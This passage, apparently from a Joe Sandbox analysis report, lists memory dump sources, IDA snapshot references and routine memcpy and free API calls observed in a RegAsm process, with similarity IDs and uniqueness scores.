                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B67F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: malloc$free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C82F611
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C82F623
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C82F652
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C82F668
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%